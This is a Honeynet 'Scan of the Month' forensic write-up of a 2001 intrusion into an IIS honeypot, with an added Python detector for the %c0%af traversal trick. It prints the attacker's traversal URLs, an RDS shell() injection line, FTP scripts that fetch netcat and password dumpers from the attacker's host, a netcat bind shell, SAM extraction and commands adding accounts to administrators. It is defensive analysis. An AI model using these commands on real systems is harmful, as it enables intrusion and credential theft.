From hulver@janes.demon.co.uk Fri Apr 20 20:30:12 2001
Date: Wed, 11 Apr 2001 21:43:12 +0100
From: y
To: project@honeynet.org
Subject: Scan of the month (April) submission

Write up for April 2001 Honeynet Challenge of the Month. By Hulver

1. Which exploit(s) were used to attack the system.

The attacker uses a combination of the MSADC/RDS exploit and the filename canonicalization (MS00-057 & MS00-078) problems to compromise the server, upload files and run a remote shell.

2. How were the exploits used to gain access and control the system?

The attacker requests pages normally, then uses the %c0%af hole (filename canonicalization) to request a file they should not normally be able to request (boot.ini). This is returned without problems.

The attacker then uses an RDS exploit to create a file (c:\fun), which he then checks has been created using the %c0%af vuln.

Then the attacker tries to create some automated ftp scripts to download files to the server. He first tries this using the RDS exploit. His first script cannot log in to the intended server due to a password failure. Using the RDS exploit he then gets the Honeypot to ftp to his own machine. The connect works, so he tries to create a script that will automatically download files from his machine onto the Honeypot. Due to his own typing mistakes this fails.

The first time, he creates the script incorrectly. He fails to use the right redirection type (he uses > instead of >>), so the first command in his script (open 213.116.251.162) is overwritten by his second command (johna2k). The ftp program never connects to his machine to download the correct files.

He then tries again, but this time he misses the echo command from the open statement, so that command never gets written to the file. The ftp script is again not working right, because it does not open a connection to his machine.

He tries again, and again he forgets the echo command of his ftp script.
After failing to download files onto the Honeypot, he tries a different approach. He copies cmd.exe to cmd1.exe, and then uses the %c0%af exploit to create the ftp script. This time he gets all the commands right, and runs the script. The honeypot then connects to his machine, and downloads the following files.

nc.exe
pdump.exe
samdump.dll

As soon as the nc.exe file has been downloaded onto the honeypot, he executes it (using the %c0%af exploit) by running

nc -l -p 6969 -e cmd1.exe

This binds a command prompt to port 6969. As soon as this is available, he telnets into it.

He has a bit of a look around the system using the command prompt, then tries to run pdump.exe using the RDS exploit. He tries to do this several times, trying many different ways of running the program, but never with any luck. He gives up on this, and has a bit of a look around the server. He then runs

echo Hi, i know that this is a lab server, but patch the holes! :-) >>README.NOW.Hax0r

and then tries to get a list of users & sessions to a text file. This also is not very successful. After a few tries, he eventually gets the IUSR_ & IWAM_ users added to the local administrators group.

At 12:58:09 he tries to run pdump in his shell; this fails with "Failed to open lsass: 5. Exiting." (Error 5 is access denied. The nc shell's access token was built when cmd1.exe started, before IUSR_KENNY was added to administrators, so the new group membership does not apply to that shell.)
At 12:59:02 he uses the RDS exploit to try and add the user "testuser" and add it to the administrators group.
At 13:00:36 he uses his shell to try and add the user "hi guy". This fails.
At 13:01:36 he uses his shell to try and run the command "net user himan HarHar666 /ADD".
At 13:05:27 he deletes the following files that he uploaded to the system:

samdump.dll
pdump.exe

He then uses the RDS exploit to run several variations of the command

rdisk -s
rdisk /s

while checking the \winnt\repair directory with his shell for the results. Using the RDS exploit he then runs

type c:\winnt\repair\sam._ >>c:\har.txt

and then, using his shell, checks that the file c:\har.txt is there (it is!).
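The %c0%af requests at the start of this answer are worth seeing decoded. What follows is an added example for this writeup, not part of the original submission and not code from IIS or from any exploit: it takes the request paths quoted in Appendix A (both the %-escaped form and the raw-byte form), runs a ".." check on them before and after UTF-8 decoding, and resolves the result against an assumed web root of C:/InetPub/wwwroot (taken from the c:\inetpub\wwwroot paths in the transcript). A conforming decoder rejects C0 AF as an overlong sequence; the lenient decode the vulnerable server performed turns it into "/", which is why a check done before decoding stays quiet and the file comes back from C:\.

```python
"""Detect the IIS "%c0%af" folder-traversal trick (MS00-078) in request paths.

Added example for this writeup, not part of the original submission or of any
vendor tool. Sample request paths are constructed from the URLs quoted in
Appendix A; WEB_ROOT is an assumption based on the paths seen in the transcript.
"""
import re
from urllib.parse import unquote_to_bytes

WEB_ROOT = "C:/InetPub/wwwroot"   # assumed; matches c:\inetpub\wwwroot in the transcript


def lenient_utf8_decode(raw: bytes) -> str:
    """Decode like the vulnerable server: a two-byte lead (C0..DF) plus a
    continuation byte is accepted even when the value fits in 7 bits, so
    C0 AF -> "/" and C1 9C -> "\\". Everything else passes through byte-wise."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def strict_utf8_decode(raw: bytes):
    """A conforming decoder rejects overlong forms; returns None in that case."""
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def canonicalize(path: str):
    """Resolve "." and ".." over both slash styles. Returns the canonical path
    relative to the web root and how many levels it climbed above the root."""
    stack, climbed = [], 0
    for seg in re.split(r"[/\\]+", path):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                climbed += 1
        else:
            stack.append(seg)
    return "/" + "/".join(stack), climbed


def analyze(request_path: bytes) -> dict:
    """Apply the ".." check in both orders: on the %-decoded bytes (what the
    server inspected) and after the lenient UTF-8 decode (what it opened)."""
    pct_decoded = unquote_to_bytes(request_path)        # %XX -> raw bytes
    before = pct_decoded.decode("latin-1")              # bytes as opaque chars
    after = lenient_utf8_decode(pct_decoded)
    _, climbed_before = canonicalize(before)
    canon_after, climbed_after = canonicalize(after)
    root_parts = WEB_ROOT.split("/")
    keep = max(1, len(root_parts) - climbed_after)      # cannot climb above the drive
    resolved = "/".join(root_parts[:keep] + [s for s in canon_after.split("/") if s])
    return {
        "check_before_decode_fires": climbed_before > 0,
        "check_after_decode_fires": climbed_after > 0,
        "strict_utf8_ok": strict_utf8_decode(pct_decoded) is not None,
        "resolved": resolved,
    }


# Constructed samples: the two encodings the intruder used, a benign request,
# and a plain "../" that a pre-decode check catches.
SAMPLES = {
    "pct":   b"/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini",
    "raw":   b"/guest/default.asp/..\xc0\xaf../..\xc0\xaf../..\xc0\xaf../boot.ini",
    "ok":    b"/guest/default.asp",
    "plain": b"/guest/../../boot.ini",
}

if __name__ == "__main__":
    for name, path in SAMPLES.items():
        r = analyze(path)
        print(f"{name:5} before={r['check_before_decode_fires']!s:5} "
              f"after={r['check_after_decode_fires']!s:5} "
              f"strict_ok={r['strict_utf8_ok']!s:5} -> {r['resolved']}")
```

Run it directly to print one line per sample; the interesting rows are "pct" and "raw", where the check before decoding is quiet and the check after decoding lands on C:/boot.ini. The defensive lesson is ordering: decode first (and reject overlong sequences outright), canonicalize, and only then apply the access check.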
He checks he can type it using his shell, and then exits.

He then uses the %c0%af exploit to start the shell again on port 6969, using the nc.exe, but does not telnet into it yet. He then uses the %c0%af exploit to start the shell again, on port 6968 this time, using the nc.exe. He then telnets into the shell on port 6968.

He copies c:\har.txt to c:\inetput\wwwroot and tries to GET it using his web browser. He then tries to delete it using his shell, but gets "Access Denied" messages. He then tries to delete it using the RDS exploit, but a dir from his shell shows it is still there.

He then looks to see if drives d: e: f: g: exist, but they do not. He then tries a: b:

He then exits from this shell, but uses his %c0%af exploit to attach it to the 6968 port again.

Within another minute somebody (same person?) then connects from 202.85.60.156 to the 6968 shell. This person has a look around the server before changing to the c:\ directory and running the command

echo best honeypot i've seen till now :) > rfp.txt

The person at 213.116.251.162 then starts requesting files using the %c0%af exploit: first \boot.ini, then \READ.NOW.hax0r.

The person from 202.85.60.156 starts having a real good look round the server, examining the contents of several files. They then run

echo test > test.txt

while in c:\inetpub\wwwroot. Straight after that someone (same person?) from ip address 213.116.251.162 requests the file /text.txt from the web server. They then run

echo this can't be true > test.txt
type test.txt

Then 213.116.251.162 requests the file /test.txt from the web server. We then have a succession of ip addresses requesting /test.txt from the web server.

213.46.45.38 requests /test.txt
213.48.120.242 requests /test.txt
194.126.101.110 requests /test.txt
213.93.39.186 requests /test.txt
24.43.44.7 requests /test.txt
198.142.92.196 requests /test.txt

202.85.50.156, using the remote shell, copies default.htm to default.html. 213.116.251.162 then starts using %c0%af to create another ftp script.
This time they upload whisker.tar.gz from the honeypot onto their own machine.

204.137.229.4 requests /test.txt from the web server.
213.116.251.162 then uses the %c0%af exploit to delete the ftp script file.
64.219.144.66 requests /test.txt from the web server.
213.64.51.77 requests /test.txt from the web server.
193.253.209.220 requests /test.txt from the web server.

4. How could this attack have been prevented?

Remove the RDS functions (i.e. delete the msadcs.dll file; see MS99-025). Apply the patch from Microsoft mentioned in MS00-057. Apply more restrictive NTFS ACLs.

5. How much time did you spend on this analysis and writeup?

1 hour creating a tool to help read the snort log output.
4/5 hours analysis & writeup.

Bonus Question. Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not?

Yes, they knew it was a Honeypot. The

echo best honeypot i've seen till now :) > rfp.txt

command sort of gives that away.

Nice Challenge. Love looking at them, this is my first writeup, I hope you find it as interesting reading this as I did writing it.

hulver@crafty-software.co.uk

----

Appendix A. (Semi-complete transcript of all commands used during break-in).

Intruder from 213.116.251.162 connects to web server at 12:25:09 and requests /
213.116.251.162 requests /guest/default.asp at 12:25:14
At 12:25:22 213.116.251.162 requests

/guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../boot.ini
then /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../boot.ini
then /guest/default.asp/..À¯../..À¯../..À¯../boot.ini
then /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini

(Where "À¯" appears, the two bytes C0 AF were sent unescaped and are shown here as Latin-1.) This is successful and returns the boot.ini file.

At 12:26:35 the user from 213.116.251.162 requests /msadc/ from the web server, but gets a 403 - Access Forbidden.
At 12:26:49 they then try /msadc/msadcs.dll and get an OK response.
At 12:27:08 they then exploit the RDS hole to run the following SQL query.
Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|'.².driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

This is most likely an automated tool, as the MIME boundary is !ADM!ROX!YOUR!WORLD!, as used by Rain Forest Puppy's own exploit script.

At 12:27:15 the following GETs are sent to the server

/guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../fun
/guest/default.asp/..À¯../..À¯../..À¯../fun
/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun
/guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../fun

The web server then returns

werd

This tells the attacker that the RDS exploit was successful.

OK. It's 12:32:50 and the attacker has had a bit of a think. They then use the RDS exploit to send the following commands to the server.

echo user johna2k > ftpcom
echo hacker2000 >> ftpcom
echo get samdump.dll >> ftpcom
echo get pdump.exe >> ftpcom
echo get nc.exe >> ftpcom
echo quit >> ftpcom
ftp -s:ftpcom -n www.nether.net

At 12:33:34 the honeypot attempts to run the script.

220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
PORT 172,16,1,106,12,64
530 Please login with USER and PASS.
RETR samdump.dll
530 Please login with USER and PASS.
RETR pdump.exe
530 Please login with USER and PASS.
RETR nc.exe
530 Please login with USER and PASS.
QUIT
221 Goodbye.

This has not worked; the password was incorrect.

At 12:33:51 the attacker then runs the following command using the RDS exploit.

cmd /c pdump.exe >> new.pass

At 12:34:01 the following commands are run using the RDS exploit.

echo user johna2k > ftpcom2
echo hacker2000 >> ftpcom2
put new.pass >> ftpcom2
echo quit >> ftpcom2
ftp -s:ftpcom2 -n www.nether.net

At 12:24:30 the Honeypot attempts to connect to www.nether.net, with the following results.

220 freenet.nether.net FTP server (SunOS 5.7) ready.
USER johna2k
331 Password required for johna2k.
PASS hacker2000
530 Login incorrect.
QUIT
221 Goodbye.

Note that the Intruder made a mistake in their commands above. Even if they had been able to log into the ftp server, they missed the echo on their command, so the "put new.pass" was not in the ftpcom2 file.

The intruder then sends the command

ftp 213.116.251.162

The honeypot server does this.

220-Serv-U FTP-Server v2.5h for WinSock ready...
220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------

Note. This is the Intruder's own machine, so he is able to check if the Honeypot has indeed run his command. Perhaps he is wondering if some of his earlier commands had run.

At 12:36:37 he then uses the RDS exploit to send the following commands to the honeypot. Note the first command is useless, as the second command overwrites the file "ftpcom" again.

echo open 213.116.251.162 > ftpcom
echo johna2k > ftpcom
echo hacker2000 >> ftpcom
echo get samdump.dll >> ftpcom
echo get pdump.exe >> ftpcom
echo get nc.exe >> ftpcom
echo quit >> ftpcom
ftp -s:ftpcom

At 12:38:27 he sends some more commands to the Honeypot. Maybe he's wondering why his first script didn't work. (Remember the commands he sent during his last try overwrote the first command, so the open 213.116.251.162 never made it to the ftp client.) Whoops, looks like he forgot the echo & >>sasfile part on the first command.

open 212.139.12.26
echo johna2k >>sasfile
echo haxedj00 >>sasfile
echo get pdump.exe >>sasfile
echo get samdump.dll >>sasfile
echo get nc.exe >>sasfile
echo quit >>sasfile
ftp -s:sasfile

Right. So that won't have worked. Once again our eleet haxor has messed up his script file. Just 2 seconds later, he tries again, sending some more commands to the honeypot using the RDS exploit.
open 213.116.251.162
echo johna2k >>sasfile
echo haxedj00 >>sasfile
echo get pdump.exe >>sasfile
echo get samdump.dll >>sasfile
echo get nc.exe >>sasfile
echo quit >>sasfile
ftp -s:sasfile

Reminding me of those people who dial a wrong number, then just hit redial in an attempt to get the right number, this Intruder sends the same commands again.

He must be getting frustrated now. So he starts down a different track. At 12:40:03 he starts sending commands to the server using the encoded urls, instead of the RDS exploit.

copy+C:\winnt\system32\cmd.exe cmd1.exe

(IIS will not pass redirection characters such as > on the command line when the program being run is cmd.exe, so a copy under another name is needed before files can be written through the URL.) We then see the Honeypot respond with

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
1 file(s) copied.

He then uses this cmd1.exe to run some more commands using the %c0%af url exploit.

echo open 213.116.251.162 >ftpcom
echo johna2k >>ftpcom
echo haxedj00 >>ftpcom
echo get nc.exe >>ftpcom
echo get pdump.exe >>ftpcom
echo get samdump.dll >>ftpcom
echo quit >>ftpcom
ftp -s:ftpcom

This time he has issued the open command successfully, so will it work this time? Let's look at the Honeypot's conversation with the intruder's ftp server. The connection starts at 12:42:22.

220-Serv-U FTP-Server v2.5h for WinSock ready...
220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,71
200 PORT Command successful.
RETR nc.exe
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
226 Transfer complete.
PORT 172,16,1,106,12,72
RETR pdump.exe
150 Opening ASCII mode data connection for pdump.exe (32768 bytes).
226 Transfer complete.
PORT 172,16,1,106,12,73
200 PORT Command successful.
RETR samdump.dll
150 Opening ASCII mode data connection for samdump.dll (36864 bytes).
226 Transfer complete.
QUIT
221 Buh bye, you secksi hax0r j00 :]

As soon as the Honeypot has downloaded nc.exe, the intruder doesn't wait for the rest of the download to complete; they just start running nc.exe. They issue the following command to the Honeypot via the %c0%af exploit.

nc -l -p 6969 -e cmd1.exe

OK. That worked. The intruder now has nc running cmd1.exe bound to port 6969.

At 12:43:30 the intruder then telnets into the server on port 6969 and starts having a look around.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\Program Files\Common Files\system\msadc

02/04/01  06:41a        <DIR>          .
02/04/01  06:41a        <DIR>          ..
09/25/97  07:41a                   596 adcjavas.inc
09/25/97  07:41a                   589 adcvbs.inc
04/30/97  11:00p               208,144 cmd1.exe
02/04/01  06:41a                    98 ftpcom
09/25/97  08:28a               172,816 msadce.dll
09/25/97  08:16a                 5,632 msadcer.dll
09/25/97  08:24a                23,312 msadcf.dll
09/25/97  08:24a                91,408 msadco.dll
09/25/97  08:19a                 5,120 msadcor.dll
09/26/97  08:19a                42,256 msadcs.dll
02/04/01  06:41a                59,392 nc.exe
02/04/01  06:41a                32,768 pdump.exe
10/02/97  07:28a                19,388 readme.txt
02/04/01  06:41a                36,864 samdump.dll
              16 File(s)        698,383 bytes
                          1,690,861,056 bytes free

The intruder then uses the RDS exploit to run

C:\Program Files\Common Files\system\msadc\pdump.exe >>yay.txt

(Note the unquoted path containing spaces: cmd.exe will try to run "C:\Program" and fail, which fits yay.txt being created by the redirection but staying empty.) Then, on his remote shell, he runs

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\Program Files\Common Files\system\msadc

02/04/01  06:41a        <DIR>          .
02/04/01  06:41a        <DIR>          ..
09/25/97  07:41a                   596 adcjavas.inc
09/25/97  07:41a                   589 adcvbs.inc
04/30/97  11:00p               208,144 cmd1.exe
02/04/01  06:41a                    98 ftpcom
09/25/97  08:28a               172,816 msadce.dll
09/25/97  08:16a                 5,632 msadcer.dll
09/25/97  08:24a                23,312 msadcf.dll
09/25/97  08:24a                91,408 msadco.dll
09/25/97  08:19a                 5,120 msadcor.dll
09/26/97  08:19a                42,256 msadcs.dll
02/04/01  06:41a                59,392 nc.exe
02/04/01  06:41a                32,768 pdump.exe
10/02/97  07:28a                19,388 readme.txt
02/04/01  06:41a                36,864 samdump.dll
              16 File(s)        698,383 bytes
                          1,690,861,056 bytes free

Looks like the pdump command didn't work. He then types the following commands.

C:\>[Adir
The name specified is not recognized as an internal or external command, operable program or batch file.

(Looks like he tried to press up-arrow to recall the last command.)

C:\>dir
(Still no yay.txt showing up)

C:\>del ftpcom

C:\>ls
(Whoops, looks like somebody has been using U*ix too much)

C:\>dir
(Still no yay.txt showing up)

C:\>type readme.e
The system cannot find the file specified.

He then posts another command via the RDS exploit.

C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt

Then, using the nc shell, he goes looking for the results.

C:\>c:.
The filename, directory name, or volume label syntax is incorrect.

C:\>cd\

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/26/00  07:36p        <DIR>          exploits
02/04/01  06:26a                     7 fun
12/07/00  03:30p        <DIR>          InetPub
12/07/00  03:12p        <DIR>          Multimedia Files
12/26/00  07:10p        <DIR>          New Folder
01/26/01  02:10p            78,643,200 pagefile.sys
12/21/00  08:59p        <DIR>          Program Files
12/21/00  08:59p        <DIR>          TEMP
02/04/01  06:42a        <DIR>          WINNT
12/26/00  07:09p        <DIR>          wiretrip
02/04/01  06:43a                     0 yay.txt
              14 File(s)     78,643,529 bytes
                          1,690,861,056 bytes free

C:\>rm ..
The name specified is not recognized as an internal or external command, operable program or batch file.

C:\>del fun

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/26/00  07:36p        <DIR>          exploits
12/07/00  03:30p        <DIR>          InetPub
12/07/00  03:12p        <DIR>          Multimedia Files
12/26/00  07:10p        <DIR>          New Folder
01/26/01  02:10p            78,643,200 pagefile.sys
12/21/00  08:59p        <DIR>          Program Files
12/21/00  08:59p        <DIR>          TEMP
02/04/01  06:42a        <DIR>          WINNT
12/26/00  07:09p        <DIR>          wiretrip
02/04/01  06:43a                     0 yay.txt
              13 File(s)     78,643,522 bytes
                          1,690,861,056 bytes free

C:\>cd exploites
The system cannot find the path specified.

C:\>dir

C:\>cd exploits

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\exploits

12/26/00  07:36p        <DIR>          .
12/26/00  07:36p        <DIR>          ..
12/26/00  07:36p        <DIR>          microsoft
12/26/00  07:35p        <DIR>          newfiles
12/26/00  07:24p        <DIR>          unix
               5 File(s)              0 bytes
                          1,690,861,056 bytes free

C:\>cd microsoft

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\exploits\microsoft

12/26/00  07:36p        <DIR>          .
12/26/00  07:36p        <DIR>          ..
11/05/97  09:46a                87,312 95sscrk.zip
08/15/00  02:06p                   734 ac.zip
08/12/98  09:46a                 9,417 anger.tar.gz
               5 File(s)         97,463 bytes
                          1,690,861,056 bytes free

C:\>cd ..

C:\>cd newfiles

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\exploits\newfiles

12/26/00  07:35p        <DIR>          .
12/26/00  07:35p        <DIR>          ..
               2 File(s)              0 bytes
                          1,690,861,056 bytes free

C:\>cd ..

C:\>cd unix

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\exploits\unix

12/26/00  07:24p        <DIR>          .
12/26/00  07:24p        <DIR>          ..
12/26/00  07:25p        <DIR>          sunos-exploits
12/26/00  07:24p        <DIR>          tcp-exploits
12/26/00  07:24p        <DIR>          trojans
12/26/00  07:16p        <DIR>          udp-exploits
12/26/00  07:15p        <DIR>          ultrix-exploits
12/26/00  07:15p        <DIR>          xwin-exploits
               8 File(s)              0 bytes
                          1,690,861,056 bytes free

C:\>cd ..

C:\>dir

C:\>cd ..

C:\>dir

Now he posts another command via the RDS exploit.

C:\>pdump.exe >> c:\yay.txt

Then, using his nc shell, he goes looking for the results.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/26/00  07:36p        <DIR>          exploits
12/07/00  03:30p        <DIR>          InetPub
12/07/00  03:12p        <DIR>          Multimedia Files
12/26/00  07:10p        <DIR>          New Folder
01/26/01  02:10p            78,643,200 pagefile.sys
12/21/00  08:59p        <DIR>          Program Files
12/21/00  08:59p        <DIR>          TEMP
02/04/01  06:44a        <DIR>          WINNT
12/26/00  07:09p        <DIR>          wiretrip
02/04/01  06:43a                     0 yay.txt
              13 File(s)     78,643,522 bytes
                          1,690,861,056 bytes free

Still nothing there; try again.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/26/00  07:36p        <DIR>          exploits
12/07/00  03:30p        <DIR>          InetPub
12/07/00  03:12p        <DIR>          Multimedia Files
12/26/00  07:10p        <DIR>          New Folder
01/26/01  02:10p            78,643,200 pagefile.sys
12/21/00  08:59p        <DIR>          Program Files
12/21/00  08:59p        <DIR>          TEMP
02/04/01  06:44a        <DIR>          WINNT
12/26/00  07:09p        <DIR>          wiretrip
02/04/01  06:43a                     0 yay.txt
              13 File(s)     78,643,522 bytes
                          1,690,861,056 bytes free

C:\>cat yay
The name specified is not recognized as an internal or external command, operable program or batch file.

C:\>type yay.
The system cannot find the file specified.

C:\>type yay.txt
(The file is empty)

C:\>net session
System error 5 has occurred.
Access is denied.

(Whoops, we are running as the IUSR_ account in this shell, no access to stuff like that. If only he had bound his shell using the RDS exploit, whose commands run with the web server's SYSTEM privileges, as the later "net localgroup ... /ADD" via RDS shows.)

C:\>net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_KENNY
IWAM_KENNY
The command completed with one or more errors.

At 12:47:48 he posts another command via RDS.

C:\>net session >>yay2.txt

He then checks the directory list, and sees that the file yay2 has been created and contains some text. So he examines this.

C:\>type yay2.txt
There are no entries in the list.

He then deletes this file and runs

C:\>net session >>yay3.txt
System error 5 has occurred.
Access is denied.
After another mistyped command, he then tries to delete some more files.

C:\>del yay*
C:\yay.txt
The process cannot access the file because it is being used by another process.

C:\>del yay3.txt
Could Not Find C:\yay3.txt

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/26/00  07:36p        <DIR>          exploits
12/07/00  03:30p        <DIR>          InetPub
12/07/00  03:12p        <DIR>          Multimedia Files
12/26/00  07:10p        <DIR>          New Folder
01/26/01  02:10p            78,643,200 pagefile.sys
12/21/00  08:59p        <DIR>          Program Files
12/21/00  08:59p        <DIR>          TEMP
02/04/01  06:46a        <DIR>          WINNT
12/26/00  07:09p        <DIR>          wiretrip
02/04/01  06:43a                     0 yay.txt
              13 File(s)     78,643,522 bytes
                          1,690,861,056 bytes free

He then posts another command via the RDS exploit.

net users >>heh.txt

Using his nc shell, he does a directory listing, and the heh.txt file is there. He types some more commands.

C:\>yuper
The name specified is not recognized as an internal or external command, operable program or batch file.

C:\>type heh.txt
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_KENNY
IWAM_KENNY
The command completed with one or more errors.

C:\>del heh.txt

C:\>cd program files

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\Program Files

12/21/00  08:59p        <DIR>          .
12/21/00  08:59p        <DIR>          ..
12/07/00  03:11p        <DIR>          Common Files
12/21/00  08:59p        <DIR>          D4
12/07/00  03:23p        <DIR>          ICW-Internet Connection Wizard
12/07/00  03:37p        <DIR>          Microsoft FrontPage
12/07/00  03:34p        <DIR>          Mts
12/07/00  03:23p        <DIR>          Outlook Express
11/26/00  06:42p        <DIR>          Plus!
12/16/00  06:54p        <DIR>          Syslogd
11/26/00  06:56p        <DIR>          Windows NT
              11 File(s)              0 bytes
                          1,690,861,056 bytes free

C:\>cd ..

C:\>echo Hi, i know that this is a lab server, but patch the holes! :-) >>README.NOW.Hax0r

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 8403-6A0E

 Directory of C:\

11/26/00  12:34p                     0 AUTOEXEC.BAT
11/26/00  06:57p                   322 boot.ini
11/26/00  12:34p                     0 CONFIG.SYS
12/26/00  07:36p        <DIR>          exploits
12/07/00  03:30p        <DIR>          InetPub
12/07/00  03:12p        <DIR>          Multimedia Files
12/26/00  07:10p        <DIR>          New Folder
01/26/01  02:10p            78,643,200 pagefile.sys
12/21/00  08:59p        <DIR>          Program Files
02/04/01  06:49a                    69 README.NOW.Hax0r
12/21/00  08:59p        <DIR>          TEMP
02/04/01  06:48a        <DIR>          WINNT
12/26/00  07:09p        <DIR>          wiretrip
02/04/01  06:43a                     0 yay.txt
              14 File(s)     78,643,591 bytes
                          1,690,861,056 bytes free

C:\>net group
Group Accounts for \\
-------------------------------------------------------------------------------
*Domain Admins           *Domain Guests           *Domain Users
The command completed with one or more errors.

C:\>net localgroup
System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated.

C:\>net group domain admins
The syntax of this command is:
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
          groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
          groupname username [...] {/ADD | /DELETE} [/DOMAIN]

C:\>[Anet group /?
The name specified is not recognized as an internal or external command, operable program or batch file.

C:\>net group ??
The syntax of this command is:
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
          groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
          groupname username [...] {/ADD | /DELETE} [/DOMAIN]

C:\>net group /?
The syntax of this command is:
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
          groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
          groupname username [...] {/ADD | /DELETE} [/DOMAIN]

C:\>net group
Group Accounts for \\
-------------------------------------------------------------------------------
*Domain Admins           *Domain Guests           *Domain Users
The command completed with one or more errors.

C:\>net localgroup
System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated.

C:\>net localgroup /domain admins
System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated.

C:\>net localgroup domain admins
The syntax of this command is:
NET LOCALGROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
               groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
               groupname name [...] {/ADD | /DELETE} [/DOMAIN]

C:\>net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_KENNY
IWAM_KENNY
The command completed with one or more errors.

After this unsuccessful attempt at something, the intruder then goes back to issuing commands via the RDS exploit.

net localgroup Domain Admins IWAM_KENNY /ADD
net localgroup Domain Admins IUSR_KENNY /ADD

Then, back to his nc shell.

C:\>net session
System error 5 has occurred.
Access is denied.

C:\>[A[A[Anet localgroup domain admins
The name specified is not recognized as an internal or external command, operable program or batch file.

C:\>net group domain admins
The syntax of this command is:
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
          groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
          groupname username [...] {/ADD | /DELETE} [/DOMAIN]

C:\>net localgroup administrators
Alias name     administrators
Comment        Members can fully administer the computer/domain

Members
-------------------------------------------------------------------------------
Administrator            Domain Admins
The command completed successfully.

Then, back to the RDS exploit he goes.

net localgroup administrators IUSR_KENNY /ADD
net localgroup administrators IWAM_KENNY /ADD

Then, back to the nc shell.

C:\>[Anet localgroup administrators
The name specified is not recognized as an internal or external command, operable program or batch file.
C:\>net localgroup administrators
Alias name     administrators
Comment        Members can fully administer the computer/domain

Members
-------------------------------------------------------------------------------
Administrator            Domain Admins            IUSR_KENNY
IWAM_KENNY
The command completed successfully.

Success. It is now 12:56:38, and the Intruder has (finally) managed to add the IUSR_ accounts to the administrators group.

